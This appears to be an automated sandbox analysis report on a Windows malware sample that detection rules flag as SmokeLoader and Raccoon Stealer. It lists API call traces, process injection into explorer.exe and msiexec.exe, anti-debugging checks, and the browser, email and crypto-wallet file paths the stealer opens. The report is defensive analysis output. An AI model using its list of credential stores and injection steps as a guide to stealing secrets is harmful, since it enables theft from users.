Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E mov eax, dword ptr fs:[00000030h]	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E mov eax, dword ptr fs:[00000030h]	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E mov eax, dword ptr fs:[00000030h]	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E mov eax, dword ptr fs:[00000030h]	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E mov eax, dword ptr fs:[00000030h]	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E mov eax, dword ptr fs:[00000030h]	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E mov eax, dword ptr fs:[00000030h]	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E mov eax, dword ptr fs:[00000030h]	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E mov eax, dword ptr fs:[00000030h]	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E mov eax, dword ptr fs:[00000030h]	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E mov eax, dword ptr fs:[00000030h]	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E mov eax, dword ptr fs:[00000030h]	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72718452 mov eax, dword ptr fs:[00000030h]	0_2_72718452
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642440 mov eax, dword ptr fs:[00000030h]	0_2_72642440
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270145F mov eax, dword ptr fs:[00000030h]	0_2_7270145F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267245F mov eax, dword ptr fs:[00000030h]	0_2_7267245F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267245F mov eax, dword ptr fs:[00000030h]	0_2_7267245F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267245F mov eax, dword ptr fs:[00000030h]	0_2_7267245F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267245F mov eax, dword ptr fs:[00000030h]	0_2_7267245F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267245F mov eax, dword ptr fs:[00000030h]	0_2_7267245F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267245F mov eax, dword ptr fs:[00000030h]	0_2_7267245F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267245F mov eax, dword ptr fs:[00000030h]	0_2_7267245F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267245F mov eax, dword ptr fs:[00000030h]	0_2_7267245F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267245F mov eax, dword ptr fs:[00000030h]	0_2_7267245F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270544C mov eax, dword ptr fs:[00000030h]	0_2_7270544C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270544C mov eax, dword ptr fs:[00000030h]	0_2_7270544C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270544C mov eax, dword ptr fs:[00000030h]	0_2_7270544C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270544C mov eax, dword ptr fs:[00000030h]	0_2_7270544C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72644459 mov eax, dword ptr fs:[00000030h]	0_2_72644459
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72649420 mov eax, dword ptr fs:[00000030h]	0_2_72649420
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265A423 mov eax, dword ptr fs:[00000030h]	0_2_7265A423
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265A423 mov eax, dword ptr fs:[00000030h]	0_2_7265A423
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265A423 mov eax, dword ptr fs:[00000030h]	0_2_7265A423
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648436 mov eax, dword ptr fs:[00000030h]	0_2_72648436
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648436 mov eax, dword ptr fs:[00000030h]	0_2_72648436
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72670430 mov eax, dword ptr fs:[00000030h]	0_2_72670430
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642416 mov eax, dword ptr fs:[00000030h]	0_2_72642416
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267341B mov eax, dword ptr fs:[00000030h]	0_2_7267341B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267341B mov eax, dword ptr fs:[00000030h]	0_2_7267341B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267341B mov eax, dword ptr fs:[00000030h]	0_2_7267341B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726494E5 mov ecx, dword ptr fs:[00000030h]	0_2_726494E5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727164FB mov eax, dword ptr fs:[00000030h]	0_2_727164FB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727164FB mov eax, dword ptr fs:[00000030h]	0_2_727164FB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726474EA mov eax, dword ptr fs:[00000030h]	0_2_726474EA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726474EA mov eax, dword ptr fs:[00000030h]	0_2_726474EA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726474EA mov eax, dword ptr fs:[00000030h]	0_2_726474EA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726474EA mov eax, dword ptr fs:[00000030h]	0_2_726474EA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727014EC mov eax, dword ptr fs:[00000030h]	0_2_727014EC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727044EF mov eax, dword ptr fs:[00000030h]	0_2_727044EF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B4D0 mov eax, dword ptr fs:[00000030h]	0_2_7264B4D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B4D0 mov eax, dword ptr fs:[00000030h]	0_2_7264B4D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727184CD mov eax, dword ptr fs:[00000030h]	0_2_727184CD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726414A0 mov eax, dword ptr fs:[00000030h]	0_2_726414A0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726794B0 mov eax, dword ptr fs:[00000030h]	0_2_726794B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726794B0 mov eax, dword ptr fs:[00000030h]	0_2_726794B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726794B0 mov eax, dword ptr fs:[00000030h]	0_2_726794B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726794B0 mov eax, dword ptr fs:[00000030h]	0_2_726794B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726794B0 mov eax, dword ptr fs:[00000030h]	0_2_726794B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726794B0 mov eax, dword ptr fs:[00000030h]	0_2_726794B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703490 mov eax, dword ptr fs:[00000030h]	0_2_72703490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703490 mov eax, dword ptr fs:[00000030h]	0_2_72703490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703490 mov eax, dword ptr fs:[00000030h]	0_2_72703490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703490 mov eax, dword ptr fs:[00000030h]	0_2_72703490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703490 mov eax, dword ptr fs:[00000030h]	0_2_72703490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703490 mov eax, dword ptr fs:[00000030h]	0_2_72703490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703490 mov eax, dword ptr fs:[00000030h]	0_2_72703490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703490 mov eax, dword ptr fs:[00000030h]	0_2_72703490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703490 mov eax, dword ptr fs:[00000030h]	0_2_72703490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703490 mov eax, dword ptr fs:[00000030h]	0_2_72703490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703490 mov eax, dword ptr fs:[00000030h]	0_2_72703490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703490 mov eax, dword ptr fs:[00000030h]	0_2_72703490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72657488 mov eax, dword ptr fs:[00000030h]	0_2_72657488
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266D490 mov eax, dword ptr fs:[00000030h]	0_2_7266D490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264356C mov eax, dword ptr fs:[00000030h]	0_2_7264356C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264356C mov eax, dword ptr fs:[00000030h]	0_2_7264356C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267F56B mov eax, dword ptr fs:[00000030h]	0_2_7267F56B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267F56B mov eax, dword ptr fs:[00000030h]	0_2_7267F56B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267056B mov eax, dword ptr fs:[00000030h]	0_2_7267056B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72682570 mov eax, dword ptr fs:[00000030h]	0_2_72682570
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72682570 mov eax, dword ptr fs:[00000030h]	0_2_72682570
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72682570 mov eax, dword ptr fs:[00000030h]	0_2_72682570
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D154A mov eax, dword ptr fs:[00000030h]	0_2_726D154A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D154A mov eax, dword ptr fs:[00000030h]	0_2_726D154A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267E52F mov ecx, dword ptr fs:[00000030h]	0_2_7267E52F

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: 4_2_00432AC2 __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree,Sleep,GetLastError,

4_2_00432AC2

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648420 RtlAddVectoredExceptionHandler,	0_2_72648420
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_0040A8E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040A8E6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_0040B8F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0040B8F4
Source: C:\Users\user\AppData\Roaming\cwfbibg	Code function: 3_2_0040A8E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040A8E6
Source: C:\Users\user\AppData\Roaming\cwfbibg	Code function: 3_2_0040B8F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0040B8F4
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0043FFF9 SetUnhandledExceptionFilter,	4_2_0043FFF9
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004460B1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_004460B1
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_004401BB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_004401BB
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_00405027 SetUnhandledExceptionFilter,	4_2_00405027
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: 4_2_0043FE97 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0043FE97
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Code function: 5_2_00402D40 SetUnhandledExceptionFilter,	5_2_00402D40

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: cwfbibg.2.dr

Jump to dropped file

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Memory allocated: C:\Windows\SysWOW64\msiexec.exe base: 2660000 protect: page read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Memory allocated: C:\Windows\SysWOW64\msiexec.exe base: 2690000 protect: page read and write			Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\48F3.exe

Code function: 5_2_00401D00 EntryPoint,GetModuleFileNameW,GetModuleHandleW,CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,GetThreadContext,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,

5_2_00401D00

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Thread created: C:\Windows\explorer.exe EIP: 3821AE8			Jump to behavior
Source: C:\Users\user\AppData\Roaming\cwfbibg	Thread created: unknown EIP: 3841AE8			Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cwfbibg	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cwfbibg	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2660000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2690000			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\48F3.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK			Jump to behavior

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

Code function: 0_2_7267DE50 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,

0_2_7267DE50

Source: explorer.exe, 00000002.00000000.1293585125.0000000001960000.00000002.00000001.sdmp, msiexec.exe, 00000009.00000002.1695301938.0000000002D40000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.1292867384.0000000001308000.00000004.00000020.sdmp, msiexec.exe, 00000009.00000002.1695301938.0000000002D40000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.1293585125.0000000001960000.00000002.00000001.sdmp, msiexec.exe, 00000009.00000002.1695301938.0000000002D40000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.1293585125.0000000001960000.00000002.00000001.sdmp, msiexec.exe, 00000009.00000002.1695301938.0000000002D40000.00000002.00000001.sdmp	Binary or memory string: Program Managers

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: 4_2_0043FCBB cpuid

4_2_0043FCBB

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: GetLocaleInfoA,	0_2_0040BE61
Source: C:\Users\user\AppData\Roaming\cwfbibg	Code function: GetLocaleInfoA,	3_2_0040BE61
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,	4_2_004365C3
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,GetUserNameA,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,WaitForSingleObject,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,	4_2_004253C0
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: EnumSystemLocalesW,	4_2_0045803A
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: EnumSystemLocalesW,	4_2_004620DE
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: EnumSystemLocalesW,	4_2_00462093
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: EnumSystemLocalesW,	4_2_00462179
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_00462204
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: GetLocaleInfoW,	4_2_00462457
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_0046257D
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: GetLocaleInfoW,	4_2_00458667
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: GetLocaleInfoW,	4_2_00462683
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_00462752
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_00461DF1
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Code function: GetLocaleInfoW,	4_2_00461FEC

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: 4_2_00440063 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,RtlQueryPerformanceCounter,

4_2_00440063

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: 4_2_00436041 __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,

4_2_00436041

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: 4_2_00436041 __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,

4_2_00436041

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe

Code function: 0_2_72672700 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,

0_2_72672700

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000003.1518715900.000000004B3BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3BD3.exe PID: 4680, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\LocalLow\machineinfo.txt, type: DROPPED

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1267461020.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1451110742.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1428267644.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.y98WYYcJ2U.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.y98WYYcJ2U.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.y98WYYcJ2U.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cwfbibg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cwfbibg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.cwfbibg.1f0000.0.raw.unpack, type: UNPACKEDPE

Contains functionality to steal Internet Explorer form passwords

Show sources

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2

4_2_0043479B

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum Wallet

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\pkcs11.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior

Remote Access Functionality:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000003.1518715900.000000004B3BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3BD3.exe PID: 4680, type: MEMORY
